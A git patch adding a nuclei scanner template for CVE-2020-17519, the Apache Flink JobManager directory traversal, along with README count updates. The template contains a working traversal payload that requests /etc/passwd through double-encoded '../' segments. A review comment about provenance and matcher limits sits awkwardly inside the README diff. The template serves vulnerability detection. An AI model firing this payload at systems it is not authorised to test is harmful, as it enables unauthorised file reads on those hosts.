From dfd308612b2e665f32ca45466598fdf9a224b987 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 6 Jan 2021 12:38:41 +0530
Subject: [PATCH 1/2] adding CVE-2020-17519
---
 cves/2020/CVE-2020-17519.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cves/2020/CVE-2020-17519.yaml
diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml
new file mode 100644
index 0000000000..926d6f1974
--- /dev/null
+++ b/cves/2020/CVE-2020-17519.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-17519
+
+info:
+ name: Apache Flink directory traversal
+ author: pd-team
+ severity: high
+ description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
+
+ # Source: https://github.com/B1anda0/CVE-2020-17519
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
From 4c8c34992a96c56ae80685b228800d2201dbb5fa Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 6 Jan 2021 07:09:19 +0000
Subject: [PATCH 2/2] Auto Update README [Wed Jan 6 07:09:19 UTC 2021] :robot:
---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 0f6aa64a3f..71ce2450d4 100644
--- a/README.md
+++ b/README.md
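Review bot: In cves/2020/CVE-2020-17519.yaml the only provenance is the `# Source:` comment inside the `info` block, which a YAML parser discards and which points at a third-party repository rather than the vendor advisory. Consider carrying it as a structured field, e.g. `reference: <vendor advisory URL>` (placeholder), and extending `description` with the fixed release named in that advisory so a finding also tells the operator what to upgrade to. The matcher pair (status `200` plus `root:[x*]:0:0:` in the body) can only confirm on hosts that have a Unix passwd file, so a non-match is not evidence that the JobManager is patched. A one-line comment above `matchers` stating that limitation would keep a clean scan from being read as a clean bill of health.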
@@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H
 | Templates | Counts | Templates | Counts |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves | 145 | files | 48 |
+| cves | 146 | files | 48 |
 | vulnerabilities | 42 | panels | 49 |
 | technologies | 41 | security-misconfiguration | 28 |
 | workflows | 17 | tokens | 8 |
@@ -151,6 +151,7 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── CVE-2020-16952.yaml
 │   ├── CVE-2020-17505.yaml
 │   ├── CVE-2020-17506.yaml
+│   ├── CVE-2020-17519.yaml
 │   ├── CVE-2020-2096.yaml
 │   ├── CVE-2020-2140.yaml
 │   ├── CVE-2020-23972.yaml
@@ -477,7 +478,7 @@ An overview of the nuclei template directory including number of templates and H
-**24 directories, 418 files**.
+**24 directories, 419 files**.
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.